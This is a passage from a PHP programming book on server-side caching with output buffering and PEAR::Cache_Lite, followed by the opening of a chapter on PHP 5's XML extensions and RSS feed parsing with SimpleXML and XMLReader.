      When we called readCache, we gave it an expiry time of 604800 seconds (one week);
      readCache uses the file modification time of the cache file to determine whether
      the cache is still valid.

      For the body of the page, we’ll use the same process as before. However, this time,
      when we call readCache, we’ll use an expiry time of five seconds; the cache file
      will be updated whenever it’s more than five seconds old:

                                                                    smartcache.php (excerpt)

         if (!$body = readCache('body.cache', 5))
         {
           echo 'The body time is now: ' . date('H:i:s') . '<br />';
           $body = ob_get_contents();
           ob_clean();
           writeCache($body, 'body.cache');
         }



      The page footer is effectively the same as the header. After the footer, the output
      buffering is stopped and the contents of the three variables that hold the page data
      are displayed:

                                                                    smartcache.php (excerpt)

   if (!$footer = readCache('footer.cache', 604800)) {
 ?>
     <p>The footer time is now: <?php echo date('H:i:s'); ?></p>
   </body>
 </html>
 <?php
     $footer = ob_get_contents();
     ob_clean();
     writeCache($footer, 'footer.cache');
   }
   ob_end_clean();

   echo $header . $body . $footer;
 ?>




The end result looks like this:

 The header time is now: 17:10:42

 The body time is now: 18:07:40

 The footer time is now: 17:10:42



The header and footer are updated on a weekly basis, while the body is updated
whenever it is more than five seconds old. If you keep refreshing the page, you’ll
see the body time updating.

Discussion
Note that if you have a page that builds content dynamically, based on a number
of variables, you’ll need to make adjustments to the way you handle your cache
files. For example, you might have an online shopping catalog whose listing pages
are defined by a URL such as:

http://example.com/catalogue/view.php?category=1&page=2

This URL should show page two of all items in category one; let’s say this is the
category for socks. But if we were to use the caching code above, the results of the
first page of the first category we looked at would be cached, and shown for any
request for any other page or category, until the cache expiry time elapsed. This
would certainly confuse the next visitor who wanted to browse the category for
shoes—that person would see the cached content for socks!

To avoid this issue, you’ll need to incorporate the category ID and page number
into the cache file name like so:

   $cache_filename = 'catalogue_' . $category_id . '_' .
       $page . '.cache';
   if (!$catalogue = readCache($cache_filename, 604800))
   {
     ⋮ display the category HTML…
   }



      This way, the correct cached content can be retrieved for every request.
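
      Since the category ID and page number come from the URL, it’s worth making sure
      they can’t smuggle unexpected characters into the file name. The sketch below
      assumes that both values are meant to be whole numbers; the function name
      catalogueCacheFilename is hypothetical.

```php
<?php
// Hypothetical helper: builds the cache file name from the request values.
// Casting to int keeps characters such as "/" and ".." out of the name.
function catalogueCacheFilename($categoryId, $page)
{
    return 'catalogue_' . (int) $categoryId . '_' . (int) $page . '.cache';
}
```

      The result can be passed straight to readCache and writeCache in place of the
      $cache_filename variable used above.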


                 Nesting Buffers
               You can nest one buffer within another practically ad infinitum simply by calling
               ob_start more than once. This can be useful if you have multiple operations
               that use the output buffer, such as one that catches the PHP error messages, and
               another that deals with caching. Care needs to be taken to make sure that
               ob_end_flush or ob_end_clean is called every time ob_start is used.
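
      Here is a small sketch of two nested buffers. Each ob_start call is matched by
      one ob_get_clean call, which fetches the contents of the innermost active
      buffer and closes it; the strings used are arbitrary.

```php
<?php
ob_start();                    // outer buffer
echo 'outer[';

ob_start();                    // inner buffer, nested inside the outer one
echo 'inner';
$inner = ob_get_clean();       // closes only the inner buffer

echo strtoupper($inner) . ']'; // this output lands in the outer buffer
$outer = ob_get_clean();       // closes the outer buffer
```

      At the end of this script, $inner contains only the text echoed while the
      inner buffer was active, while $outer contains everything that was echoed into
      the outer buffer, including the modified copy of $inner.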



      How do I use PEAR::Cache_Lite
      for server-side caching?
      The previous solution explored the ideas behind output buffering using the PHP
      ob_* functions. As we mentioned at the time, though, that approach probably isn’t
      the best way to meet the dual goals of keeping your code maintainable and having a
      reliable caching mechanism. It’s time to see how we can put a caching system into
      action in a manner that will be reliable and easy to maintain.

      Solution
      In the interests of keeping your code maintainable and having a reliable caching
      mechanism, it’s a good idea to delegate the responsibility of caching logic to classes
      you trust. In this case, we’ll use a little help from PEAR::Cache_Lite (version 1.7.2
      is used in the examples here).8 Cache_Lite provides a solid yet easy-to-use library
      for caching, and handles issues such as: file locking; creating, checking for, and
      deleting cache files; controlling the output buffer; and directly caching the results
      from function and class method calls. More to the point, Cache_Lite should be
      relatively easy to apply to an existing application, requiring only minor code
      modifications.

      8
          http://pear.php.net/package/Cache_Lite/

Cache_Lite has four main classes. First is the base class, Cache_Lite, which deals
purely with creating and fetching cache files, but makes no use of output buffering.
This class can be used alone for caching operations in which you have no need for
output buffering, such as storing the contents of a template you’ve parsed with PHP.

The examples here will not use Cache_Lite directly, but will instead focus on the
three subclasses. Cache_Lite_Function can be used to call a function or class
method and cache the result, which might prove useful for storing a MySQL query
result set, for example. The Cache_Lite_Output class uses PHP’s output control
functions to catch the output generated by your script and store it in cache files; it
allows you to perform tasks such as those we completed in “How do I cache just
the parts of a page that change infrequently?”. The Cache_Lite_File class bases
cache expiry on the timestamp of a master file, with any cache file being deemed
to have expired if it is older than the timestamp.

Let’s work through an example that shows how you might use Cache_Lite to create
a simple caching solution. When we’re instantiating any child classes of Cache_Lite,
we must first provide an array of options that determine the behavior of Cache_Lite
itself. We’ll look at these options in detail in a moment. Note that the cacheDir
directory we specify must be one to which the script has read and write access:

                                                                cachelite.php (excerpt)

 <?php
   require_once 'Cache/Lite/Output.php';
   $options = array(
     'cacheDir' => './cache/',
     'writeControl' => true,
     'readControl' => true,
     'fileNameProtection' => false,
     'readControlType' => 'md5'
   );
   $cache = new Cache_Lite_Output($options);



For each chunk of content that we want to cache, we need to set a lifetime (in
seconds) for which the cache should live before it’s refreshed. Next, we use the
start method, available only in the Cache_Lite_Output class, to turn on output
      buffering. The two arguments passed to the start method are an identifying value
      for this particular cache file, and a cache group. The group is an identifier that allows
      a collection of cache files to be acted upon; it’s possible to delete all cache files in
      a given group, for example (more on this in a moment). The start method will
      check to see if a valid cache file is available and, if so, it will begin outputting the
      cache contents. If a cache file is not available, start will return false and begin
      caching the following output.

      Once the output for this chunk has finished, we use the end method to stop buffering
      and store the content as a file:

                                                                        cachelite.php (excerpt)

         $cache->setLifeTime(604800);

         if (!$cache->start('header', 'Static')) {
       ?>
       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
       <head>
         <title>PEAR::Cache_Lite example</title>
         <meta http-equiv="Content-Type"
             content="text/html; charset=iso-8859-1"/>
       </head>
       <body>
         <h2>PEAR::Cache_Lite example</h2>
         <p>The header time is now: <?php echo date('H:i:s'); ?></p>
       <?php
           $cache->end();
         }



      To cache the body and footer, we follow the same procedure we used for the header.
      Note that we specify a lifetime of just five seconds when caching the body, whereas
      the header and footer are cached for 604800 seconds (one week):

                                                                        cachelite.php (excerpt)

         $cache->setLifeTime(5);
         if (!$cache->start('body', 'Dynamic')) {
           echo 'The body time is now: ' . date('H:i:s') . '<br />';
           $cache->end();
         }

         $cache->setLifeTime(604800);
         if (!$cache->start('footer', 'Static')) {
       ?>
           <p>The footer time is now: <?php echo date('H:i:s'); ?></p>
         </body>
       </html>
       <?php
           $cache->end();
         }
       ?>




When the page is viewed, Cache_Lite creates cache files in the cache directory. Because
we’ve set the fileNameProtection option to false, Cache_Lite creates the files
with these names:

■ ./cache/cache_Static_header
■ ./cache/cache_Dynamic_body
■ ./cache/cache_Static_footer

You can read about the fileNameProtection option—and many more—in “What
configuration options does Cache_Lite support?”. When the same page is requested
later, the code above will use the cached file if it is valid and has not expired.
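
To see why start returns false on a cache miss and true on a hit, it can help to look at a stripped-down version of the pattern. The class below is a hypothetical stand-in written for illustration, not Cache_Lite's implementation: SketchOutputCache and its file naming are assumptions, and it omits locking, read control, and error handling.

```php
<?php
// Hypothetical stand-in for the start()/end() pattern; this is not
// Cache_Lite's implementation, only the general idea behind it.
class SketchOutputCache
{
    private $dir;
    private $lifeTime;
    private $file;

    public function __construct($dir, $lifeTime)
    {
        $this->dir = rtrim($dir, '/') . '/';
        $this->lifeTime = $lifeTime;
    }

    // On a hit, echo the cached copy and return true. On a miss, start
    // buffering and return false so the caller generates the content.
    public function start($id, $group)
    {
        clearstatcache();
        $this->file = $this->dir . 'cache_' . $group . '_' . $id;
        if (is_file($this->file)
            && (time() - filemtime($this->file)) < $this->lifeTime) {
            echo file_get_contents($this->file);
            return true;
        }
        ob_start();
        return false;
    }

    // Stop buffering, store the captured output, then send it on.
    public function end()
    {
        $data = ob_get_clean();
        file_put_contents($this->file, $data, LOCK_EX);
        echo $data;
    }
}

// Usage mirrors the Cache_Lite_Output calls shown earlier.
$cache = new SketchOutputCache(sys_get_temp_dir(), 5);
if (!$cache->start('body', 'Dynamic')) {
    echo 'The body time is now: ' . date('H:i:s') . "\n";
    $cache->end();
}
```

Because the cached copy is echoed inside start, the calling script needs only the single if test around each chunk of content.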


       Protect your Cache Files
     Make sure that the directory in which you place the cache files is not publicly
     available, or you may be offering your site’s visitors access to more than you
     realize.



What configuration options
does Cache_Lite support?
When instantiating Cache_Lite (or any of its subclasses, such as
Cache_Lite_Output), you can set any of a number of options to control its
behavior. These options should be placed in an array and passed to the constructor
as shown below (and in the previous section):

         $options = array(
           'cacheDir' => './cache/',
           'writeControl' => true,
           'readControl' => true,
           'fileNameProtection' => false,
           'readControlType' => 'md5'
         );
         $cache = new Cache_Lite_Output($options);



      Solution
      The options available in the current version of Cache_Lite (1.7.2) are:

      cacheDir

         This is the directory in which the cache files will be placed. It defaults to /tmp/.

      caching
         This option switches on and off the caching behavior of Cache_Lite. If you have
         numerous Cache_Lite calls in your code and want to disable the cache for
         debugging, for example, this option will be useful. The default value is true
         (caching enabled).

      lifeTime
         This option represents the default lifetime (in seconds) of cache files. It can be
         changed using the setLifeTime method. The default value is 3600 (one hour),
         and if it’s set to null, the cache files will never expire.

      fileNameProtection
         With this option activated, Cache_Lite uses an MD5 hash to generate
         the filename for the cache file. This option protects you from errors when you
         try to use IDs or group names containing characters that aren’t valid for
         filenames; fileNameProtection must be turned on when you use
         Cache_Lite_Function. The default is true (enabled).

      fileLocking
         This option is used to switch the file locking mechanisms on and off. The default
         is true (enabled).

writeControl
   This option checks that a cache file has been written correctly immediately after
   it has been created, and throws a PEAR::Error if it finds a problem. Obviously,
   this facility would allow your code to attempt to rewrite a cache file that was
   created incorrectly, but it comes at a cost in terms of performance. The default
   value is true (enabled).

readControl
   This option checks any cache files that are being read to ensure they’re not
   corrupt. Cache_Lite is able to place inside the file a value, such as the string
   length of the file, which can be used to confirm that the cache file isn’t corrupt.
   There are three alternative mechanisms for checking that a file is valid, and
   they’re specified using the readControlType option. These mechanisms come
   at the cost of performance, but should help to guarantee that your visitors aren’t
   seeing scrambled pages. The default value is true (enabled).

readControlType
   This option lets you specify the type of read control mechanism you want to
   use. The available mechanisms are a cyclic redundancy check (crc32, the default
   value) using PHP’s crc32 function, an MD5 hash using PHP’s md5 function (md5),
   or a simple and fast string length check (strlen). Note that this mechanism is
   not intended to provide security from people tampering with your cache files;
   it’s just a way to spot corrupt files.

pearErrorMode
   This option tells Cache_Lite how it should return PEAR errors to the calling
   script. The default is CACHE_LITE_ERROR_RETURN, which means Cache_Lite will
   return a PEAR::Error object.

memoryCaching
   With memory caching enabled, every time a file is written to the cache, it is
   stored in an array in Cache_Lite. The saveMemoryCachingState and
   getMemoryCachingState methods can be used to store and access the memory
   cache data between requests. The advantage of this facility is that the complete
   set of cache files can be stored in a single file, reducing the number of disk
   read/write operations by reconstructing the cache files straight into an array to
   which your code has access. The memoryCaching option may be worth further
   investigation if you run a large site. The default value is false (disabled).

      onlyMemoryCaching
         If this option is enabled, only the memory caching mechanism will be used.
         The default value is false (disabled).

      memoryCachingLimit
         This option places a limit on the number of cache files that will be stored in
         the memory caching array. The more cache files you have, the more memory
         will be used up by memory caching, so it may be a good idea to enforce a limit
         that prevents your server from having to work too hard. Of course, this option
         places no restriction on the size of each cache file, so just one or two massive
         files may cause a problem. The default value is 1000.

      automaticSerialization
         If enabled, this option will automatically serialize all data types. While this
         approach will slow down the caching system, it is useful for caching nonscalar
         data types such as objects and arrays. For higher performance, you might
         consider serializing nonscalar data types yourself. The default value is false
         (disabled).

      automaticCleaningFactor
         This option will automatically clean old cache entries—on average, one in x
         cache writes, where x is the value set for this option. Therefore, setting this
         value to 0 will indicate no automatic cleaning, and a value of 1 will cause cache
         clearing on every cache write. A value of 20 to 200 is the recommended starting
         point if you wish to enable this facility; it causes cache cleaning to happen, on
         average, 0.5% to 5% of the time. The default value is 0 (disabled).

      hashedDirectoryLevel
         When set to a nonzero value, this option will enable a hashed directory structure.
         A hashed directory structure will improve the performance of sites that have
         thousands of cache files. If you choose to use hashed directories, start by setting
         this value to 1, and increasing it as you test for performance improvements. The
         default value is 0 (disabled).

      errorHandlingAPIBreak
         This option was added to preserve backwards compatibility with code that uses
         the old API. When the old API was run in CACHE_LITE_ERROR_RETURN mode
         (see the pearErrorMode option earlier in this list), some functions would return
         a Boolean value to indicate success, rather than returning a PEAR_Error object.
         When this value is set to true, the PEAR_Error object is returned instead.
         The default value is false (disabled).
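
Two of the options above, fileNameProtection and readControlType, are easier to picture with a little code. The following is a sketch under stated assumptions rather than Cache_Lite's own code: the function names are hypothetical, and the layout of the stored data (a control key, a newline, then the content) is invented for this example.

```php
<?php
// Sketch only: mirrors the behavior the options describe, using
// hypothetical helper names rather than Cache_Lite's own methods.

// fileNameProtection: hash the ID and group so that any characters
// they contain are safe to use in a filename.
function sketchCacheFileName($id, $group, $protect)
{
    if ($protect) {
        return 'cache_' . md5($group) . '_' . md5($id);
    }
    return 'cache_' . $group . '_' . $id;
}

// readControlType: compute the control value stored with the data.
function sketchControlKey($data, $type)
{
    switch ($type) {
        case 'md5':
            return md5($data);
        case 'strlen':
            return (string) strlen($data);
        default: // 'crc32'
            return sprintf('%u', crc32($data));
    }
}

// readControl: recompute the key on read and compare it to the stored one.
function sketchIsIntact($stored, $type)
{
    // Assumed layout for this sketch: "<key>\n<data>".
    list($key, $data) = explode("\n", $stored, 2);
    return $key === sketchControlKey($data, $type);
}

echo sketchCacheFileName('body', 'Dynamic', false), "\n"; // cache_Dynamic_body

$stored = sketchControlKey('Hello', 'strlen') . "\n" . 'Hello';
var_dump(sketchIsIntact($stored, 'strlen'));       // bool(true)
var_dump(sketchIsIntact($stored . 'x', 'strlen')); // bool(false)
```

The strlen check is the cheapest of the three but only notices a change in length; crc32 and md5 also catch content that has been altered without changing size, at a higher cost per read.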


How do I purge the Cache_Lite cache?
The built-in lifetime mechanism for Cache_Lite cache files provides a good
foundation for keeping your cache files up to date, but there will be some
circumstances in which you need the files to be updated immediately.

Solution
In cases in which you need immediate updates, the methods remove and clean
come in handy. The remove method is designed to delete a specific cache file; it
takes as arguments the cache ID and group name of the file. To delete the page body
cache file we created in “How do I use PEAR::Cache_Lite for server-side caching?”,
we’d use this code:

 $cache->remove('body', 'Dynamic');



If we use the clean method, we can delete all the files in our cache directory simply
by calling the method with no arguments; alternatively, we can specify a group of
cache files to delete. If we wanted to delete both the header and footer cache files
we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we could
do so like this:

 $cache->clean('Static');



Discussion
The remove and clean methods should obviously be called in response to events
that arise within an application. For example, if you have a discussion forum
application, you probably want to remove the relevant cache files when a visitor posts
a new message.

Although it may seem like this solution entails a lot of code modifications, with
some care it can be applied to your application in a global manner. If you have a
central script that’s included in every page, your script can simply watch for
incoming events (for example, a variable like $_GET['newPost']) and respond by deleting
the required cache files. This keeps the cache file removal mechanism central and
easier to maintain. You might also consider using the php.ini setting
auto_prepend_file to include this code in every PHP script.
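
A central purge hook of the kind described above might look something like the following sketch. The function name purgeCacheForRequest and the rebuild request key are hypothetical; the only assumption about $cache is that it offers remove and clean methods like those of Cache_Lite.

```php
<?php
// Sketch of a central purge hook. $cache is assumed to be any object with
// Cache_Lite-style remove($id, $group) and clean($group) methods; the
// 'rebuild' request key is a hypothetical example.
function purgeCacheForRequest(array $request, $cache)
{
    $purged = array();

    // A new forum post makes the cached page body stale.
    if (!empty($request['newPost'])) {
        $cache->remove('body', 'Dynamic');
        $purged[] = 'body';
    }

    // A full rebuild throws away the header and footer as well.
    if (!empty($request['rebuild'])) {
        $cache->clean('Static');
        $purged[] = 'Static';
    }

    return $purged;
}
```

In the central include file, after the cache object has been created, a single call such as purgeCacheForRequest($_GET, $cache) would then be enough. Returning the list of purged entries makes the hook easy to log and to test.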


      How do I cache function calls?
      Many web sites provide access to their data via web services such as SOAP and
      XML-RPC.9 As web services are accessed over a network, it’s often a very good idea
      to cache results so that they can be fetched locally, rather than repeating the same
      slow request to the server multiple times. A simple approach might be to use PHP
      sessions, but as that solution operates on a per-visitor basis, the opening requests
      for each visitor will still be slow.

      Solution
      Let’s assume you wish to create a web page that lists all the SitePoint books available
      on Amazon. The actual list is not likely to change from moment to moment, so why
      would we make the request to the Amazon web service every time the web page is
      displayed? We won’t! Instead, we can take advantage of Cache_Lite by caching the
      results of the web service request.


                 Requires PEAR::SOAP Version 0.11.0
               The following solution uses the PEAR::SOAP library version 0.11.0 to access the
               Amazon web service. You can find this package on the PEAR web site.10


      Here’s some hypothetical code that fetches the data from the remote Amazon server:

          $results = $amazonClient->ManufacturerSearchRequest($params);



      Using Cache_Lite_Function, we can cache the results so the data returned from
      the service can be reused; this will avoid unnecessary network calls and significantly
      improve performance.

      The following example code focuses on the caching aspect to prevent us from getting
      bogged down in the details of using the Amazon web service. You can see the
      complete script if you download this book’s code archive from the SitePoint web
      site.

      9
          You can read all about web services in Chapter 12.
      10
           http://pear.php.net/package/soap/

The Cache_Lite_Function class requires the inclusion of the following file:

                                                             cachefunction.php (excerpt)

   require_once 'Cache/Lite/Function.php';



We instantiate the Cache_Lite_Function class with some options:

                                                             cachefunction.php (excerpt)

   $options = array(
     'cacheDir' => './cache/',
     'fileNameProtection' => true,
     'writeControl' => true,
     'readControl' => true,
     'readControlType' => 'strlen',
     'defaultGroup' => 'SOAP'
   );
   $cache = new Cache_Lite_Function($options);



It’s important that the fileNameProtection option is set to true (this is in fact the
default value, but in this case I’ve set it manually to emphasize the point). If it were
set to false, the filename would be invalid, and the data would not be cached.

Here’s how we make the calls to our SOAP client class:

                                                             cachefunction.php (excerpt)

 $results = $cache->call('amazonClient->ManufacturerSearchRequest',
     $params);



If the request is being made for the first time, Cache_Lite_Function will store the
results as a serialized array or object in a cache file (not that you need to worry
about this), and this file will be used for future requests until it expires. The
setLifeTime method can again be used to specify how long the cache files should
survive before they’re refreshed; currently, the default value of 3600 seconds (one
hour) is being used. You can then use the $results variable exactly as if you were
calling the web service method directly. The output of our example script can be
seen in Figure 11.1.




                                  Figure 11.1. SitePoint books at Amazon
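
If you're curious about what caching a call involves, the idea can be sketched in a few lines of plain PHP. This is an illustration only, not the code inside Cache_Lite_Function: sketchCachedCall and slowLookup are hypothetical names, and the sketch assumes the function is identified by a plain string name and that its arguments and return value can be serialized.

```php
<?php
// Hypothetical helper illustrating the idea behind caching a call: key the
// cache file on the function name and its arguments, and store the
// serialized return value. Not Cache_Lite_Function's actual code.
function sketchCachedCall($function, array $args, $cacheDir, $lifeTime = 3600)
{
    $file = rtrim($cacheDir, '/') . '/call_'
        . md5($function . serialize($args));

    clearstatcache();
    if (is_file($file) && (time() - filemtime($file)) < $lifeTime) {
        // Cache hit: skip the call entirely.
        return unserialize(file_get_contents($file));
    }

    // Cache miss: make the real call and remember the result.
    $result = call_user_func_array($function, $args);
    file_put_contents($file, serialize($result), LOCK_EX);
    return $result;
}

// Stand-in for a slow request to a remote web service.
function slowLookup($publisher)
{
    usleep(200000);
    return array('publisher' => $publisher, 'fetched' => date('H:i:s'));
}

$dir = sys_get_temp_dir();
$first = sketchCachedCall('slowLookup', array('SitePoint'), $dir, 60);
$second = sketchCachedCall('slowLookup', array('SitePoint'), $dir, 60);
var_dump($first === $second); // bool(true): the second call came from the cache
```

Hashing the function name together with its serialized arguments means that a call with different parameters gets its own cache file, which is also why fileNameProtection matters for this class.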


      Summary
      Caching is an important and often overlooked aspect of web site development. Many
      factors that affect the performance of today’s web sites weren’t a problem for their
      predecessors—from complex, dynamic page generation, to a reliance on third-party
      data over the network. In this chapter, we’ve examined HTML meta tags, HTTP
      headers, PHP output buffering and PEAR::Cache_Lite, and we’ve seen how you
      can use them to control the caching of your web site content and improve the site’s
      reliability and performance.

Implementing a caching system for your site might be simple, but ultimately, it
depends on your requirements. If you have a busy and predominantly static web
site—such as a blog—that’s managed through a content management system, it will
likely require little alteration, yet may benefit from huge performance improvements
resulting from a small investment of your time. Setting up caching for a more
complex site that generates content on a per-user basis, such as a portal or shopping
cart system, will prove a little more tricky and time-consuming, but the benefits are
still clear. Regardless, I hope the information in this chapter has given you a good
grasp of the options available, and will help you determine which techniques are
most suitable for your application.

Chapter 12

XML and Web Services
Probably the biggest changes in PHP 5, after the overhaul of the object oriented
programming model, were the rewriting of the DOM XML extension and the
addition of the SimpleXML and SOAP extensions. PHP 5.1 then introduced two
further XML extensions, XMLReader and XMLWriter.

XML and web services are broad topics when viewed within the realm of PHP, due
to the number of facilities that are available for producing and consuming XML.
Entire books have been devoted to them.1 In this chapter, we’ll explore useful
solutions for handling some of the more common XML-related tasks, as well as for
consuming and serving XML-based web services; the rest is up to you!


        Using the Zend Framework
      A number of examples in this chapter utilize components from the Zend
      Framework.2 Installation of the framework is simple: download the appropriate format
      from http://framework.zend.com/download/, extract the archive, and update your
      include_path to point to the library directory of the installation.

1
  Two good sources include Rob Richards’s Pro PHP XML and Web Services (Berkeley: Apress, 2006),
and Thomas Myer’s No Nonsense XML Web Development With PHP (Melbourne: SitePoint, 2005).
2
  http://framework.zend.com/



      Which XML technologies are
      available in PHP 5?
      PHP 5 offers a number of new XML extensions. You can read about what’s new in
      the Zend Developer Network article, “XML in PHP 5: What’s New?”3

      Solution
      Table 12.1 summarizes the XML extensions available in PHP 5.


      Why should I use PHP’s XML extensions
      instead of PHP string functions?
      If XML is primarily a text format, why would we bother using the XML extensions?
      Why wouldn’t we simply concatenate strings to create documents, or use regular
      expressions to parse them?

      Solution
      The answer to this question is: for reasons of performance, compatibility, flexibility,
      and ease of use.

      Certainly, XML documents can be parsed using a series of regular expressions.
      However, the PCRE engine is fairly heavyweight, and isn’t optimized for such tasks.
      Tools such as SimpleXML and XMLReader allow you to iterate through a document
      with ease, grabbing only the content you need without ever once writing a regular
      expression. Using SAX, you can trigger code to execute as particular elements are
      found in the document. XSL can be used to transform XML documents into other
      XML documents, XHTML, SQL, and more.
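
As a small taste of grabbing only the content you need, here is a sketch that uses the DOM extension's XPath support. The XML document is made-up sample data (it reuses the two book titles cited in this chapter's first footnote), and the element and attribute names are assumptions made for the example.

```php
<?php
// Illustrative only: the XML below is made-up sample data.
$source = '<library>'
    . '<book year="2006"><title>Pro PHP XML and Web Services</title></book>'
    . '<book year="2005"><title>No Nonsense XML Web Development With PHP</title></book>'
    . '</library>';

$doc = new DOMDocument();
$doc->loadXML($source);
$xpath = new DOMXPath($doc);

// Select only the titles of books published in 2006.
$titles = array();
foreach ($xpath->query('/library/book[@year="2006"]/title') as $node) {
    $titles[] = $node->nodeValue;
}

echo implode("\n", $titles), "\n"; // Pro PHP XML and Web Services
```

The query states what we want in one expression; an equivalent regular expression would have to cope with attribute order, quoting styles, and whitespace by hand.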




      3
          http://devzone.zend.com/node/view/id/1713/

Table 12.1. XML Extensions in PHP

Extension     Purpose                                                 More Information
SAX           This set of PHP functions was designed for creating     http://www.php.net/xml/
              XML parsers and XML event handlers. It has been
              available since PHP 4 and is enabled by default.
DOM           This OOP extension allows you to operate on or create   http://www.php.net/dom/
              an XML document using the Document Object Model,
              or DOM. It has been available since PHP 5.0.0 and is
              enabled by default.
XPath         Built into the DOM extension, XPath allows you to
              perform queries on your XML documents. It’s been
              available as part of the DOM extension since PHP
              5.0.0.
XSL           An OOP extension for performing Extensible              http://www.php.net/xsl/
              Stylesheet Language Transformations (XSLT) on DOM
              documents, XSL has been available since PHP 5.0.0.
              It can be enabled by passing the --with-xsl
              option to the configure script.
SimpleXML     An OOP tool set used to convert XML to iterable         http://www.php.net/simplexml/
              objects, and thus allow the processing of XML using
              normal property selectors and array access. Available
              since PHP 5.0.0, SimpleXML is enabled by default;
              some features vary between PHP versions.
XMLReader     An OOP extension for iterating through an XML           http://www.php.net/xmlreader/
              stream a node at a time, XMLReader has been
              available in PECL since PHP 5.0.0, and enabled by
              default since PHP 5.1.0.
XMLWriter     This hybrid extension uses either function or OOP       http://www.php.net/xmlwriter/
              access to create XML documents. Available in PECL
              since PHP 5.1.0, it has been enabled by default since
              PHP 5.1.4. In previous versions, enable it by passing
              the --enable-xmlwriter option to the configure
              script.
XML-RPC       A set of functions that allow developers to encode      http://www.php.net/xmlrpc/
              and decode XML-RPC values and create XML-RPC
              servers that use PHP functions and callbacks to
              handle requests, XML-RPC has been available since
              PHP 4.1.0. Enable it by passing the
              --with-xmlrpc option to the configure script.
SOAP          The SOAP extension allows developers to create SOAP     http://www.php.net/soap/
              clients or servers easily, and to bind objects or
              functions to the client or server. Available since PHP
              5.0.0, it can be enabled by passing the
              --enable-soap option to the configure script.


      Discussion
      XML documents may easily be written as the standard output of an application, or
      by concatenating strings. However, you then need to worry about character encoding
      issues, character typos that may affect document validity, and more. You can avoid
      these issues using tools such as the DOM or XMLWriter extensions.
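
Here's a brief sketch of what that looks like with XMLWriter. The title string is made-up sample data chosen because it contains characters that would break a hand-concatenated document; the element names are likewise just for illustration.

```php
<?php
// The title below is made-up sample data containing characters that
// would break a hand-concatenated document.
$title = 'Cats & Dogs <Unleashed>';

$writer = new XMLWriter();
$writer->openMemory();
$writer->startDocument('1.0', 'UTF-8');
$writer->startElement('book');
$writer->writeElement('title', $title); // text is escaped for us
$writer->endElement();
$writer->endDocument();
$xml = $writer->outputMemory();

echo $xml;

// Round trip: a parser recovers the original text unchanged.
$parsed = simplexml_load_string($xml);
var_dump((string) $parsed->title === $title); // bool(true)
```

Had we written '<title>' . $title . '</title>' ourselves, the ampersand and angle brackets would have produced a document that no XML parser would accept.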


      How do I parse an RSS feed?
      RSS is becoming a ubiquitous Web technology—most sites offer RSS feeds of their
      updated content, and many use this as a means to communicate with users. How
      can you incorporate RSS feeds from other sites on your own?

      Solutions
      SimpleXML makes parsing XML as easy as traversing an object: instead of needing
      to check for the element’s position, name, and type, we simply access the element.
      To do so, though, we need to know something about the structure of the XML we’re
      parsing; RSS, since it’s a published standard, is easy to parse using SimpleXML.

      One thing to remember with SimpleXML is that if you want the actual value of a
      property you’re accessing, you must cast it to the appropriate type first; otherwise,
      you’ll receive the SimpleXMLElement representing the value. In the following
      example, we use the simplexml_load_file function to load the RSS from the
      sitepoint.com blogs feed and output the content of some of the elements:

                                                              simplexml.php (excerpt)

 $url = 'http://rss.sitepoint.com/f/sitepoint_blogs_feed';
 $xml = simplexml_load_file($url);
 $channel = $xml->channel;
 echo "Title: ", (string) $channel->title, "\n",
     "Description: ", (string) $channel->description, "\n",
     "Link: ", (string) $channel->link, "\n";
 foreach ($channel->item as $item)
 {
   echo "Item: ", (string) $item->title, "\n",
       "Link: ", (string) $item->link, "\n",
       "Description:\n", (string) $item->description, "\n";
 }
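
The need for casting is easiest to see with a feed small enough to read at a glance. The sketch below uses a made-up RSS string and simplexml_load_string, so it runs without network access; the feed contents are assumptions for illustration only.

```php
<?php
// A tiny made-up feed so the example runs without network access.
$rss = '<rss version="2.0"><channel>'
    . '<title>Example Feed</title>'
    . '<item><title>First post</title></item>'
    . '<item><title>Second post</title></item>'
    . '</channel></rss>';

$xml = simplexml_load_string($rss);
$title = $xml->channel->title;

var_dump($title instanceof SimpleXMLElement); // bool(true): an object, not a string
var_dump((string) $title);                    // string(12) "Example Feed"

// Cast before storing values, or the array will hold objects.
$itemTitles = array();
foreach ($xml->channel->item as $item) {
    $itemTitles[] = (string) $item->title;
}
print_r($itemTitles);
```

Passing an element straight to echo works because echo converts it to a string for you; the cast matters as soon as you store the value, compare it, or use it as an array key.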



The SimpleXML solution provided above is just one of several approaches you may
use with PHP 5. Let’s take a quick look at some other possibilities that exemplify
the elegance of SimpleXML.

Parsing XML with XMLReader
XMLReader is a newcomer on the PHP scene, having only become available in
PHP 5.1.0. It allows iterative access to XML documents using object oriented
notation. However, it is more in the class of SAX than DOM or SimpleXML, as it provides
a more programmatic way to process the document.

In this example, we'll build a class—Rss_XmlReader—to encapsulate the functions
we need to parse an RSS feed using XMLReader. First, we define some class properties
and the constructor method:

                                                     Rss_XmlReader.class.php (excerpt)

 class Rss_XmlReader
 {
   public $channelTitle = '';
   public $channelDesc = '';
   public $channelLink = '';
   public $items = array();
   public $xml;
   public function __construct($url = null)
   {
     if (null !== $url)
     {
       $this->load($url);
     }
   }




      The first three of these properties hold the RSS channel information, the $items
      array will hold all the RSS items from the specified feed, and $xml will hold the
      feed’s raw XML source. The constructor takes one argument: the URL of the RSS
      feed.

      If a URL is provided to the constructor, we’ll load and parse it immediately. Here’s
      what the load method looks like:

                                                           Rss_XmlReader.class.php (excerpt)

         public function load($url)
         {
           $this->xml = file_get_contents($url);
           $xr = new XMLReader();
           $xr->XML($this->xml);
           $this->channelTitle = '';
           $this->channelDesc = '';
           $this->channelLink = '';
           $this->items = array();
           while ($xr->read())
           {
             if (XMLReader::ELEMENT == $xr->nodeType)
             {
               switch ($xr->localName)
               {
                 case 'channel':
                   $this->_getChannelInfo($xr);
                   break;
                 case 'item':
                   $this->_getItem($xr);
                   break;
               }
             }
           }
         }

Using file_get_contents, we retrieve the raw XML source, instantiate a new
XMLReader, and begin to read the RSS feed. As I mentioned previously, XMLReader
requires us to iterate through every node of the document, including the text
nodes inside each element. During the load routine, we go through the top-level element
nodes of the document, and, if the current node is a channel, we read the channel
information. If it’s an item element, we read the details of the item.
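
The depth checks used in the methods that follow make more sense once you've seen exactly which nodes read visits. This sketch walks a made-up, minimal feed written without whitespace between tags, and records each node's type and depth; the feed contents are an assumption for illustration.

```php
<?php
// Made-up minimal feed with no whitespace between tags, so that every
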